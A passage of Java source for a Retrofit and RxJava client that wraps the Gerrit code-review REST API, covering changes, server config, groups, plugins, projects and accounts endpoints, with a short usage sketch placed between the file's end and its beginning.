mService.testChangeRevisionSubmitRule(changeId, revisionId, input)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionDrafts( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionDrafts(changeId, revisionId)); } @Override public Observable<CommentInfo> createChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.createChangeRevisionDraft(changeId, revisionId, input)); } @Override public Observable<CommentInfo> getChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.getChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<CommentInfo> updateChangeRevisionDraft(@NonNull String changeId, @NonNull String revisionId, @NonNull String draftId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.updateChangeRevisionDraft(changeId, revisionId, draftId, input)); } @Override public Observable<Void> deleteChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.deleteChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionComments( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionComments(changeId, revisionId)); } @Override public Observable<CommentInfo> getChangeRevisionComment(@NonNull String changeId, @NonNull String revisionId, @NonNull String commentId) 
{ return withVersionRequestCheck( mService.getChangeRevisionComment(changeId, revisionId, commentId)); } @Override public Observable<Map<String, FileInfo>> getChangeRevisionFiles( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionFiles(changeId, revisionId)); } @Override public Observable<ResponseBody> getChangeRevisionFileContent(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.getChangeRevisionFileContent(changeId, revisionId, fileId)); } @Override public Observable<ResponseBody> getChangeRevisionFileDownload(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable SuffixMode suffixMode, @Nullable Integer parent) { return withVersionRequestCheck(mService.getChangeRevisionFileDownload( changeId, revisionId, fileId, suffixMode, parent)); } @Override public Observable<DiffInfo> getChangeRevisionFileDiff(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable Integer base, @Nullable Option intraline, @Nullable Option weblinksOnly, @Nullable WhitespaceType whitespace, @Nullable IgnoreWhitespaceType ignoreWhitespace, @Nullable ContextType context) { return withVersionRequestCheck(mService.getChangeRevisionFileDiff(changeId, revisionId, fileId, base, intraline, weblinksOnly, mMediator.resolveWhiteSpaceType(whitespace), mMediator.resolveIgnoreWhiteSpaceType(ignoreWhitespace), context)); } @Override public Observable<BlameInfo> getChangeRevisionFileBlame(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck( mService.getChangeRevisionFileBlame(changeId, revisionId, fileId, base)); } @Override public Observable<Void> setChangeRevisionFileAsReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsReviewed(changeId, revisionId, fileId)); } @Override public Observable<Void> setChangeRevisionFileAsNotReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsNotReviewed(changeId, revisionId, fileId)); } @Override public Observable<ChangeInfo> cherryPickChangeRevision(@NonNull String changeId, @NonNull String revisionId, @NonNull CherryPickInput input) { return withVersionRequestCheck( mService.cherryPickChangeRevision(changeId, revisionId, input)); } // =============================== // Gerrit configuration endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-config.html" // =============================== @Override public Observable<ServerVersion> getServerVersion() { return andCacheVersion(mService.getServerVersion()); } @Override public Observable<ServerInfo> getServerInfo() { return withVersionRequestCheck(mService.getServerInfo()); } @Override public Observable<Void> confirmEmail(@NonNull EmailConfirmationInput input) { return withVersionRequestCheck(mService.confirmEmail(input)); } @Override public Observable<Map<String, CacheInfo>> getServerCaches() { return withVersionRequestCheck(mService.getServerCaches()); } @Override public Observable<Void> executeServerCachesOperations(CacheOperationInput input) { return withVersionRequestCheck(mService.executeServerCachesOperations(input)); } @Override public Observable<CacheInfo> getServerCache(@NonNull String cacheId) { return 
withVersionRequestCheck(mService.getServerCache(cacheId)); } @Override public Observable<Void> flushServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.flushServerCache(cacheId)); } @Override public Observable<SummaryInfo> getServerSummary(@Nullable Option jvm, @Nullable Option gc) { return withVersionRequestCheck(mService.getServerSummary(jvm, gc)); } @Override public Observable<Map<Capability, ServerCapabilityInfo>> getServerCapabilities() { return withVersionRequestCheck(mService.getServerCapabilities()); } @Override public Observable<List<TaskInfo>> getServerTasks() { return withVersionRequestCheck(mService.getServerTasks()); } @Override public Observable<TaskInfo> getServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.getServerTask(taskId)); } @Override public Observable<Void> deleteServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.deleteServerTask(taskId)); } @Override public Observable<List<TopMenuEntryInfo>> getServerTopMenus() { return withVersionRequestCheck(mService.getServerTopMenus()); } @Override public Observable<PreferencesInfo> getServerDefaultPreferences() { return withVersionRequestCheck(mService.getServerDefaultPreferences()); } @Override public Observable<PreferencesInfo> setServerDefaultPreferences( @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultPreferences(input)); } @Override public Observable<DiffPreferencesInfo> getServerDefaultDiffPreferences() { return withVersionRequestCheck(mService.getServerDefaultDiffPreferences()); } @Override public Observable<DiffPreferencesInfo> setServerDefaultDiffPreferences( @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultDiffPreferences(input)); } // =============================== // Gerrit groups endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-groups.html" // =============================== @Override public Observable<List<GroupInfo>> getGroupSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getGroupSuggestions(query, count)); } @Override public Observable<List<GroupInfo>> getGroups( @Nullable GroupQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable String project, @Nullable String user, @Nullable Option owned, @Nullable Option visibleToAll, @Nullable Option verbose, @Nullable List<GroupOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getGroups(query, count, start, project, user, owned, visibleToAll, verbose, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<GroupInfo> getGroup(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroup(groupId)); } @Override public Observable<GroupInfo> createGroup(@NonNull String groupName, @NonNull GroupInput input) { return withVersionRequestCheck(mService.createGroup(groupName, input)); } @Override public Observable<GroupInfo> getGroupDetail(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDetail(groupId)); } @Override public Observable<String> getGroupName(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupName(groupId)); } @Override public Observable<String> setGroupName(@NonNull String groupId, @NonNull GroupNameInput input) { return withVersionRequestCheck(mService.setGroupName(groupId, input)); } @Override public Observable<String> getGroupDescription(@NonNull String groupId) { 
return withVersionRequestCheck(mService.getGroupDescription(groupId)); } @Override public Observable<String> setGroupDescription( @NonNull String groupId, @NonNull GroupDescriptionInput input) { return withVersionRequestCheck(mService.setGroupDescription(groupId, input)); } @Override public Observable<Void> deleteGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.deleteGroupDescription(groupId)); } @Override public Observable<GroupOptionsInfo> getGroupOptions(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOptions(groupId)); } @Override public Observable<GroupOptionsInfo> setGroupOptions( @NonNull String groupId, @NonNull GroupOptionsInput input) { return withVersionRequestCheck(mService.setGroupOptions(groupId, input)); } @Override public Observable<GroupInfo> getGroupOwner(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOwner(groupId)); } @Override public Observable<GroupInfo> setGroupOwner( @NonNull String groupId, @NonNull GroupOwnerInput input) { return withVersionRequestCheck(mService.setGroupOwner(groupId, input)); } @Override public Observable<List<GroupAuditEventInfo>> getGroupAuditLog(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupAuditLog(groupId)); } @Override public Observable<List<AccountInfo>> getGroupMembers( @NonNull String groupId, @Nullable Option recursive) { return withVersionRequestCheck(mService.getGroupMembers(groupId, recursive)); } @Override public Observable<AccountInfo> getGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.getGroupMember(groupId, accountId)); } @Override public Observable<AccountInfo> addGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.addGroupMember(groupId, accountId)); } @Override public Observable<List<AccountInfo>> addGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.addGroupMembers(groupId, input)); } @Override public Observable<Void> deleteGroupMember(@NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteGroupMember(groupId, accountId)); } @Override public Observable<Void> deleteGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.deleteGroupMembers(groupId, input)); } @Override public Observable<List<GroupInfo>> getGroupIncludedGroups(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupIncludedGroups(groupId)); } @Override public Observable<GroupInfo> getGroupIncludedGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.getGroupIncludedGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.addGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroups( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.addGroupIncludeGroups(groupId, input)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull 
IncludeGroupInput input) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, input)); } // =============================== // Gerrit plugins endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-plugins.html" // =============================== @Override public Observable<Map<String, PluginInfo>> getPlugins() { return withVersionRequestCheck(mService.getPlugins()); } @Override public Observable<PluginInfo> installPlugin( @NonNull String pluginId, @NonNull PluginInput input) { return withVersionRequestCheck(mService.installPlugin(pluginId, input)); } @Override public Observable<PluginInfo> getPluginStatus(@NonNull String pluginId) { return withVersionRequestCheck(mService.getPluginStatus(pluginId)); } @Override public Observable<PluginInfo> enablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.enablePlugin(pluginId)); } @Override public Observable<PluginInfo> disablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.disablePlugin(pluginId)); } @Override public Observable<PluginInfo> reloadPlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.reloadPlugin(pluginId)); } // =============================== // Gerrit projects endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-projects.html" // =============================== @Override public Observable<Map<String, ProjectInfo>> getProjects(@Nullable Option showDescription, @Nullable Option showTree, @Nullable String branch, @Nullable ProjectType type, @Nullable String group) { return withVersionRequestCheck( mService.getProjects(showDescription, showTree, branch, type, group)); } @Override public Observable<ProjectInfo> getProject(@NonNull String projectName) { return withVersionRequestCheck(mService.getProject(projectName)); } @Override public Observable<ProjectInfo> createProject( @NonNull String projectName, @NonNull ProjectInput input) { return withVersionRequestCheck(mService.createProject(projectName, input)); } @Override public Observable<String> getProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDescription(projectName)); } @Override public Observable<String> setProjectDescription( @NonNull String projectName, @NonNull ProjectDescriptionInput input) { return withVersionRequestCheck(mService.setProjectDescription(projectName, input)); } @Override public Observable<Void> deleteProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.deleteProjectDescription(projectName)); } @Override public Observable<String> getProjectParent(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectParent(projectName)); } @Override public Observable<String> setProjectParent( @NonNull String projectName, @NonNull ProjectParentInput input) { return withVersionRequestCheck(mService.setProjectParent(projectName, input)); } @Override public Observable<String> getProjectHead(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectHead(projectName)); } @Override public Observable<String> setProjectHead( @NonNull String projectName, @NonNull HeadInput input) { return withVersionRequestCheck(mService.setProjectHead(projectName, input)); } @Override public Observable<RepositoryStatisticsInfo> getProjectStatistics(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectStatistics(projectName)); } @Override public Observable<ConfigInfo> getProjectConfig(@NonNull 
String projectName) { return withVersionRequestCheck(mService.getProjectConfig(projectName)); } @Override public Observable<ConfigInfo> setProjectConfig( @NonNull String projectName, @NonNull ConfigInput input) { return withVersionRequestCheck(mService.setProjectConfig(projectName, input)); } @Override public Observable<ResponseBody> runProjectGc(@NonNull String projectName, @NonNull GcInput input) { return withVersionRequestCheck(mService.runProjectGc(projectName, input)); } @Override public Observable<BanResultInfo> banProject( @NonNull String projectName, @NonNull BanInput input) { return withVersionRequestCheck(mService.banProject(projectName, input)); } @Override public Observable<ProjectAccessInfo> getProjectAccessRights(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectAccessRights(projectName)); } @Override public Observable<ProjectAccessInfo> setProjectAccessRights( @NonNull String projectName, @NonNull ProjectAccessInput input) { return withVersionRequestCheck(mService.setProjectAccessRights(projectName, input)); } @Override public Observable<List<BranchInfo>> getProjectBranches(@NonNull String projectName, @Nullable Integer count, @Nullable Integer start, @Nullable String substring, @Nullable String regexp) { return withVersionRequestCheck( mService.getProjectBranches(projectName, count, start, substring, regexp)); } @Override public Observable<BranchInfo> getProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranch(projectName, branchId)); } @Override public Observable<BranchInfo> createProjectBranch( @NonNull String projectName, @NonNull String branchId, @NonNull BranchInput input) { return withVersionRequestCheck(mService.createProjectBranch(projectName, branchId, input)); } @Override public Observable<Void> deleteProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.deleteProjectBranch(projectName, branchId)); } @Override public Observable<Void> deleteProjectBranches( @NonNull String projectName, @NonNull DeleteBranchesInput input) { return withVersionRequestCheck(mService.deleteProjectBranches(projectName, input)); } @Override public Observable<Base64Data> getProjectBranchFileContent( @NonNull String projectName, @NonNull String branchId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectBranchFileContent(projectName, branchId, fileId)); } @Override public Observable<MergeableInfo> getProjectBranchMergeableStatus(@NonNull String projectName, @NonNull String branchId, @NonNull String sourceBranchId, @Nullable MergeStrategy strategy) { return withVersionRequestCheck(mService.getProjectBranchMergeableStatus( projectName, branchId, sourceBranchId, strategy)); } @Override public Observable<List<ReflogEntryInfo>> getProjectBranchReflog( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranchReflog(projectName, branchId)); } @Override public Observable<List<ProjectInfo>> getProjectChildProjects(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectChildProjects(projectName)); } @Override public Observable<ProjectInfo> getProjectChildProject( @NonNull String projectName, @NonNull String childProjectName) { return withVersionRequestCheck( mService.getProjectChildProject(projectName, childProjectName)); } @Override public Observable<List<TagInfo>> getProjectTags(@NonNull String projectName) { return 
withVersionRequestCheck(mService.getProjectTags(projectName)); } @Override public Observable<TagInfo> getProjectTag(@NonNull String projectName, @NonNull String tagId) { return withVersionRequestCheck(mService.getProjectTag(projectName, tagId)); } @Override public Observable<TagInfo> createProjectTag( @NonNull String projectName, @NonNull String tagId, @NonNull TagInput input) { return withVersionRequestCheck(mService.createProjectTag(projectName, tagId, input)); } @Override public Observable<CommitInfo> getProjectCommit( @NonNull String projectName, @NonNull String commitId) { return withVersionRequestCheck(mService.getProjectCommit(projectName, commitId)); } @Override public Observable<Base64Data> getProjectCommitFileContent( @NonNull String projectName, @NonNull String commitId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectCommitFileContent(projectName, commitId, fileId)); } @Override public Observable<List<DashboardInfo>> getProjectDashboards(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDashboards(projectName)); } @Override public Observable<DashboardInfo> getProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.getProjectDashboard(projectName, dashboardId)); } @Override public Observable<DashboardInfo> setProjectDashboard(@NonNull String projectName, @NonNull String dashboardId, @NonNull DashboardInput input) { return withVersionRequestCheck( mService.setProjectDashboard(projectName, dashboardId, input)); } @Override public Observable<Void> deleteProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.deleteProjectDashboard(projectName, dashboardId)); } }
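The class above wraps every Gerrit REST endpoint in an RxJava 1 Observable and lazily caches the server version before each call. A minimal usage sketch follows; it is not part of GerritApiClient.java. MyPlatformLayer is a hypothetical PlatformAbstractionLayer implementation and the endpoint URL is illustrative, while the constructor signature and the getServerVersion()/getChangeDetail() calls are the ones defined in this class.

// Usage sketch (editorial example, not part of the source file).
// MyPlatformLayer is a hypothetical PlatformAbstractionLayer implementation.
GerritApi api = new GerritApiClient(
        "https://gerrit.example.org/",   // Retrofit base URL; a trailing slash is expected
        null,                            // null Authorization -> anonymous, no authenticator is installed
        new MyPlatformLayer());

// getServerVersion() also primes the cached version later reused by withVersionRequestCheck().
ServerVersion version = api.getServerVersion().toBlocking().first();

// Fetch a change's details; a null options list simply skips the filterByVersion() pass.
ChangeInfo change = api.getChangeDetail("12345", null).toBlocking().first();

Passing a null Authorization follows the anonymous branch of the constructor, so no basic/digest authenticator or authentication cache interceptor is added to the OkHttp client.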
gerrit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java
/* * Copyright (C) 2016 Jorge Ruesga * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.ruesga.rview.gerrit; import android.net.Uri; import android.support.annotation.NonNull; import android.support.annotation.Nullable; import com.burgstaller.okhttp.AuthenticationCacheInterceptor; import com.burgstaller.okhttp.CachingAuthenticatorDecorator; import com.burgstaller.okhttp.DispatchingAuthenticator; import com.burgstaller.okhttp.basic.BasicAuthenticator; import com.burgstaller.okhttp.digest.CachingAuthenticator; import com.burgstaller.okhttp.digest.Credentials; import com.burgstaller.okhttp.digest.DigestAuthenticator; import com.google.gson.annotations.Since; import com.ruesga.rview.gerrit.filter.AccountQuery; import com.ruesga.rview.gerrit.filter.ChangeQuery; import com.ruesga.rview.gerrit.filter.GroupQuery; import com.ruesga.rview.gerrit.filter.Option; import com.ruesga.rview.gerrit.model.*; import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import okhttp3.Interceptor; import okhttp3.OkHttpClient; import okhttp3.Request; import okhttp3.RequestBody; import okhttp3.ResponseBody; import okhttp3.logging.HttpLoggingInterceptor; import retrofit2.Retrofit; import retrofit2.adapter.rxjava.RxJavaCallAdapterFactory; import retrofit2.converter.gson.GsonConverterFactory; import rx.Observable; public class GerritApiClient implements GerritApi { private final String mEndPoint; private final GerritApi mService; private final PlatformAbstractionLayer mAbstractionLayer; protected ServerVersion mServerVersion; private final ApiVersionMediator mMediator = new ApiVersionMediator() { @Override public WhitespaceType resolveWhiteSpaceType(WhitespaceType type) { if (mServerVersion.getVersion() < 2.12) { return null; } return type; } @Override public IgnoreWhitespaceType resolveIgnoreWhiteSpaceType(IgnoreWhitespaceType type) { if (mServerVersion.getVersion() >= 2.12) { return null; } return type; } }; public GerritApiClient(String endpoint, Authorization authorization, PlatformAbstractionLayer abstractionLayer) { mAbstractionLayer = abstractionLayer; mEndPoint = endpoint; DispatchingAuthenticator authenticator = null; if (authorization != null && !authorization.isAnonymousUser()) { final Credentials credentials = new Credentials( authorization.mUsername, authorization.mPassword); final BasicAuthenticator basicAuthenticator = new BasicAuthenticator(credentials); final DigestAuthenticator digestAuthenticator = new DigestAuthenticator(credentials); authenticator = new DispatchingAuthenticator.Builder() .with("digest", digestAuthenticator) .with("basic", basicAuthenticator) .build(); } // OkHttp client OkHttpClient.Builder clientBuilder = OkHttpHelper.getSafeClientBuilder(); clientBuilder.followRedirects(true) .readTimeout(60000, java.util.concurrent.TimeUnit.MILLISECONDS) .followSslRedirects(true) .addInterceptor(createConnectivityCheckInterceptor()) .addInterceptor(createLoggingInterceptor()) 
.addInterceptor(createHeadersInterceptor()); if (authorization != null && !authorization.isAnonymousUser()) { final Map<String, CachingAuthenticator> authCache = new ConcurrentHashMap<>(); clientBuilder .authenticator(new CachingAuthenticatorDecorator(authenticator, authCache)) .addInterceptor(new AuthenticationCacheInterceptor(authCache)); } OkHttpClient client = clientBuilder.build(); // Gson adapter GsonConverterFactory gsonFactory = GsonConverterFactory.create( GsonHelper.createGerritGsonBuilder(true, mAbstractionLayer).create()); // RxJava adapter RxJavaCallAdapterFactory rxAdapter = RxJavaCallAdapterFactory.create(); // Retrofit Retrofit retrofit = new Retrofit.Builder() .baseUrl(endpoint) .client(client) .addConverterFactory(gsonFactory) .addCallAdapterFactory(rxAdapter) .build(); // Build the api mService = retrofit.create(GerritApi.class); } private HttpLoggingInterceptor createLoggingInterceptor() { HttpLoggingInterceptor logging = new HttpLoggingInterceptor(mAbstractionLayer::log); logging.setLevel(mAbstractionLayer.isDebugBuild() ? HttpLoggingInterceptor.Level.BODY : HttpLoggingInterceptor.Level.BASIC); return logging; } private Interceptor createHeadersInterceptor() { return chain -> { Request original = chain.request(); Request.Builder requestBuilder = original.newBuilder(); if (!mAbstractionLayer.isDebugBuild()) { requestBuilder.header("Accept", "application/json"); } Request request = requestBuilder.build(); return chain.proceed(request); }; } private Interceptor createConnectivityCheckInterceptor() { return chain -> { if (!mAbstractionLayer.hasConnectivity()) { throw new NoConnectivityException(); } return chain.proceed(chain.request()); }; } private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { return Observable.fromCallable(() -> { if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } return observable.toBlocking().first(); }); } private Observable<ServerVersion> andCacheVersion(final Observable<ServerVersion> observable) { return Observable.fromCallable(() -> { mServerVersion = observable.toBlocking().first(); return mServerVersion; }); } @SuppressWarnings("unchecked") private <T> List<T> filterByVersion(List<T> o) { if (o == null) { return null; } if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } ArrayList<T> filter = new ArrayList<>(o.size()); for (T t : o) { boolean isSupported = true; try { Since a = t.getClass().getDeclaredField(t.toString()).getAnnotation(Since.class); if (a != null && a.value() > mServerVersion.getVersion()) { isSupported = false; } } catch (Exception e) { // Ignore } if (isSupported) { filter.add(t); } } return filter; } // =============================== // Non-Api operations // =============================== private String toUnauthenticatedEndpoint(String endPoint) { return endPoint.endsWith("/a/") ? 
endPoint.substring(0, endPoint.length() - 2) : endPoint; } @Override public Uri getChangeUri(@NonNull String changeId) { return Uri.parse(String.format(Locale.US, "%s#/c/%s", toUnauthenticatedEndpoint(mEndPoint), changeId)); } @Override public Uri getRevisionUri(@NonNull String changeId, @NonNull String revisionNumber) { return Uri.parse(String.format(Locale.US, "%s#/c/%s/%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionNumber)); } @Override public Uri getDownloadRevisionUri( @NonNull String changeId, @NonNull String revisionId, @NonNull DownloadFormat format) { return Uri.parse(String.format(Locale.US, "%schanges/%s/revisions/%s/archive?format=%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionId, format.toString().toLowerCase())); } @Override public ApiVersionMediator getApiVersionMediator() { return mMediator; } // =============================== // Gerrit access endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-access.html" // =============================== @Override public Observable<Map<String, ProjectAccessInfo>> getAccessRights(@NonNull String[] names) { return withVersionRequestCheck(mService.getAccessRights(names)); } // =============================== // Gerrit accounts endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html" // =============================== @Override public Observable<List<AccountInfo>> getAccountsSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getAccountsSuggestions(query, count)); } @Override public Observable<List<AccountInfo>> getAccounts( @NonNull AccountQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<AccountOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccounts(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<AccountInfo> getAccount(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccount(accountId)); } @Override public Observable<AccountInfo> createAccount( @NonNull String username, @NonNull AccountInput input) { return withVersionRequestCheck(mService.createAccount(username, input)); } @Override public Observable<AccountDetailInfo> getAccountDetails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDetails(accountId)); } @Override public Observable<String> getAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountName(accountId)); } @Override public Observable<String> setAccountName( @NonNull String accountId, @NonNull AccountNameInput input) { return withVersionRequestCheck(mService.setAccountName(accountId, input)); } @Override public Observable<Void> deleteAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteAccountName(accountId)); } @Override public Observable<String> getAccountUsername(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountUsername(accountId)); } @Override public Observable<String> setAccountUsername( @NonNull String accountId, @NonNull UsernameInput input) { return withVersionRequestCheck(mService.setAccountUsername(accountId, input)); } @Override public Observable<String> isAccountActive(@NonNull String accountId) { return withVersionRequestCheck(mService.isAccountActive(accountId)); } @Override public Observable<Void> setAccountAsActive(@NonNull String accountId) { return 
withVersionRequestCheck(mService.setAccountAsActive(accountId)); } @Override public Observable<Void> setAccountAsInactive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsInactive(accountId)); } @Override public Observable<String> getHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.getHttpPassword(accountId)); } @Override public Observable<String> setHttpPassword( @NonNull String accountId, @NonNull HttpPasswordInput input) { return withVersionRequestCheck(mService.setHttpPassword(accountId, input)); } @Override public Observable<Void> deleteHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteHttpPassword(accountId)); } @Override public Observable<OAuthTokenInfo> getOAuthToken(@NonNull String accountId) { return withVersionRequestCheck(mService.getOAuthToken(accountId)); } @Override public Observable<List<EmailInfo>> getAccountEmails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEmails(accountId)); } @Override public Observable<EmailInfo> getAccountEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.getAccountEmail(accountId, emailId)); } @Override public Observable<EmailInfo> createAccountEmail(@NonNull String accountId, @NonNull String emailId, @NonNull EmailInput input) { return withVersionRequestCheck(mService.createAccountEmail(accountId, emailId, input)); } @Override public Observable<Void> deleteAccountEmail(@NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.deleteAccountEmail(accountId, emailId)); } @Override public Observable<Void> setAccountPreferredEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.setAccountPreferredEmail(accountId, emailId)); } @Override public Observable<List<SshKeyInfo>> getAccountSshKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountSshKeys(accountId)); } @Override public Observable<SshKeyInfo> getAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.getAccountSshKey(accountId, sshKeyId)); } @Override public Observable<SshKeyInfo> addAccountSshKey( @NonNull String accountId, @NonNull String encodedKey) { return withVersionRequestCheck(mService.addAccountSshKey(accountId, encodedKey)); } @Override public Observable<Void> deleteAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.deleteAccountSshKey(accountId, sshKeyId)); } @Override public Observable<List<GpgKeyInfo>> getAccountGpgKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGpgKeys(accountId)); } @Override public Observable<GpgKeyInfo> getAccountGpgKey( @NonNull String accountId, @NonNull String gpgKeyId) { return withVersionRequestCheck(mService.getAccountGpgKey(accountId, gpgKeyId)); } @Override public Observable<Map<String, GpgKeyInfo>> addAccountGpgKeys( @NonNull String accountId, @NonNull AddGpgKeyInput input) { return withVersionRequestCheck(mService.addAccountGpgKeys(accountId, input)); } @Override public Observable<Map<String, GpgKeyInfo>> deleteAccountGpgKeys( @NonNull String accountId, @NonNull DeleteGpgKeyInput input) { return withVersionRequestCheck(mService.deleteAccountGpgKeys(accountId, input)); } @Override public Observable<AccountCapabilityInfo> getAccountCapabilities( @NonNull String accountId, @Nullable List<Capability> filter) { return 
